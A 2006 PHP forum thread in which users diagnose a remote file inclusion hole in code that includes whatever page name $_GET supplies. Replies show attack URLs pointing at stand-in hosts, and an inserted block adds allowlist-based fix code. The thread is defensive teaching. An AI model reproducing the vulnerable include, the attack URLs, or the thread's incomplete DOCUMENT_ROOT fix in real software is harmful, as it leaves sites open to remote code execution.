Pixelsize Posted July 7, 2006

Hi there, I think this is the place where to post this question. At the webhosting I'm at, they keep suspending my webpage because my code is vulnerable to attacks. This is the code:

[code]
<?
// Security patch against spam exploit
// Provided by TangoWebs
$badStrings = array("Content-Type:", "MIME-Version:", "Content-Transfer-Encoding:", "bcc:", "cc:");
foreach($_POST as $k => $v){
    foreach($badStrings as $v2){
        if(strpos($v, $v2) !== false){
            header("HTTP/1.0 403 Forbidden");
            exit;
        }
    }
}
?>
<title>Heh I didn't wanna show the site's title xD sry xD</title>
<link href="style.css" rel="stylesheet" type="text/css">
<?php
// Variables
$page=$_GET['page']; // Gets info
// Display
include "header.html"; // Shows Header
if ($page=="") {
    $page="home";
}
$page=$page . ".html";
include $page;
include "footer.html";
?>
[/code]

TangoWebs is the name of the webhosting company... they provided this code and asked me to put it in, and they say hackers are still sending e-mails, mail bombing, or whatever... from my website. This is just one page, but they are all exactly the same, they just change which directory to include from. Thanks for your time, I hope anyone could see what I still can't. Cya!! :D
ToonMariner Posted July 7, 2006

I would need to see the code for generating the e-mails, how the user submits the content for the e-mail and any associated login stuff (like if the user must be logged in and a session is created).

The only thing I could suggest in this little lot is this: record the IP address the request originated from and store this in the database along with the time of the request. Each time the script runs it should check the IP address against the database and if there is not sufficient time between the last e-mail and now, deny the request. I think a 10 minute interval would be sufficient.....
Pixelsize Posted July 7, 2006 (Author)

No login, no forms... this is all... They say they won't reactivate my account until I can ensure that the code has no security holes :S So I can't do tests... But do you think anyone could just send e-mails by taking advantage of... what? a $_GET???
ToonMariner Posted July 7, 2006

Well in that case the only vulnerability is the include $page bit. Say someone had a page they had written to send out mass e-mails and it was located here:

http://www.dodgeysite.com/email.php

They could use your page to exploit that by simply setting page=http://www.dodgeysite.com/email.php in the URL.

On my sites I always use a control on includes that are driven by the user's input. My includes always look like

[code]
include($_SERVER['DOCUMENT_ROOT'] . $page);
[/code]

That way the file being included MUST reside on your domain.
wildteen88 Posted July 7, 2006

This code here is very vulnerable!

[code]
if ($page=="") {
    $page="home";
}
$page=$page . ".html";
include $page;
[/code]

A malicious attacker can put something like this:

yoursite.com?page=http://attackersite.com/badfile.html

Now within that badfile the attacker made there could be PHP code which would not only affect your account, but everyone else's account on the host's server, and could cause havoc with the database.

So what's the way around this? Validate the user input. Before you include, make sure:
- the page variable doesn't hold URLs - preg_match can help you there
- the file you are going to be including actually exists on your site - file_exists can help here too

With file_exists don't do this:

[code]
if(file_exists($_GET['page']))
[/code]

Append your site's document root to it like so:

[code]
if(file_exists($_SERVER['DOCUMENT_ROOT'] . $_GET['page']))
[/code]

Never use raw _GET or POST'd data! Always validate and verify user input.
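As an added example that is not part of this thread, here is how the page-selection code from the first post could be rewritten to cover both ToonMariner's point (the included file must live on your own server) and wildteen88's (validate the page name and check that the file exists). Prefixing DOCUMENT_ROOT on its own still lets a request containing ../ reach files outside the intended directory, so an allowlist of page names does the real work and a realpath check adds defence in depth. The page names home, about and contact, and the pages/ directory under the document root, are assumptions for the example.

```php
<?php
// Added example, not code from the thread: a replacement for `include $page;`
// in the first post. Assumes the page fragments live in <document root>/pages/
// and are named home.html, about.html and contact.html.

// Allowlist of page names that may be requested via ?page=...
$allowedPages = ['home', 'about', 'contact'];

// Directory that every included file must resolve into.
$baseDir = realpath($_SERVER['DOCUMENT_ROOT'] . '/pages');

function resolvePage($requested, array $allowed, $baseDir)
{
    // A missing or empty ?page= falls back to home, as in the original code.
    $name = ($requested === null || $requested === '') ? 'home' : $requested;

    // Step 1: allowlist. A URL such as http://attackersite.com/badfile, a
    // "../" sequence, a null byte or an array (?page[]=x) can never equal one
    // of the allowed names, so remote and traversal includes cannot happen.
    if (!in_array($name, $allowed, true)) {
        return false;
    }

    // Step 2: defence in depth. Resolve the final path and confirm the file
    // exists and still sits inside $baseDir.
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name . '.html');
    if ($baseDir === false || $path === false
        || strpos($path, $baseDir . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    return $path;
}

$page = resolvePage(isset($_GET['page']) ? $_GET['page'] : null, $allowedPages, $baseDir);
if ($page === false) {
    header('HTTP/1.0 404 Not Found');
    exit;
}

include 'header.html';
include $page;
include 'footer.html';
```

Because the allowlist is checked before any filesystem call, file_exists and realpath only ever see one of the fixed names, which is what makes the document-root prefix safe. Independently of the code, setting allow_url_include = Off in php.ini (available since PHP 5.2) means include can never fetch a remote file even if raw input is reintroduced later.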
shoz Posted July 7, 2006

There was recently a discussion similar to this one that you should find useful.
http://www.phpfreaks.com/forums/index.php/topic,95407.msg382014.html#msg382014
Pixelsize Posted July 7, 2006 (Author)

xD!!! GOSH!!! WHAT AN OBVIOUS EXPLOIT, ye, I'll fix it right away - thank you all for your time... gosh, so obvious xD. Thank you all. Cya!
Chips Posted July 8, 2006

[quote author=wildteen88 link=topic=99803.msg393230#msg393230 date=1152296362]
Append your site's document root to it like so:
if(file_exists($_SERVER['DOCUMENT_ROOT'] . $_GET['page']))
[/quote]

That's really useful - thank you :)